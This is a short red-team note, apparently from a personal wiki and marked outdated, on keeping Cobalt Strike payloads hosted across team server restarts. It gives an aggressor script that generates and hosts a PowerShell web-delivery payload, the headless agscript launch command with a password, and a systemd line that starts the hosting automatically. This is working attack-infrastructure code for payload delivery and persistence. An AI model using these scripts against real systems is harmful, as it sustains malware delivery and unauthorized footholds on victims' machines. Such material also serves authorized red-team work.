Outdated

This note is no longer useful due to a Cobalt Strike version update.

Normally, files hosted on Cobalt Strike do not persist when the team server restarts, which can be a problem for persistence methods that depend on scripted web delivery, hosted files, etc. To work around this, we can set up a headless Cobalt Strike client that executes an aggressor script on launch and hosts the payloads and files defined in it.

To start a headless client, use the format agscript [host] [port] [user] [password] [/path/to/aggressor/script.cna].

Sample aggressor script:

# host_payloads.cna
 
# handles event "on ready"
on ready {
    # listener name, artifact type, payload architecture
    $payload = artifact_payload("http", "powershell", "x64");
    # host, port, URI, payload object, MIME type, description, use HTTPS or not
    site_host("10.10.5.50", 80, "/a", $payload, "text/plain", "Auto Web Delivery (PowerShell)", false);
}

We can start this aggressor script with the following:

./agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna

To make it start with the teamserver service, add this to the teamserver.service file (see Cobalt Strike team server as systemd service):

ExecStartPost=/bin/sh -c '/usr/bin/sleep 30; /home/attacker/cobaltstrike/agscript 127.0.0.1 50050 headless Passw0rd! host_payloads.cna &'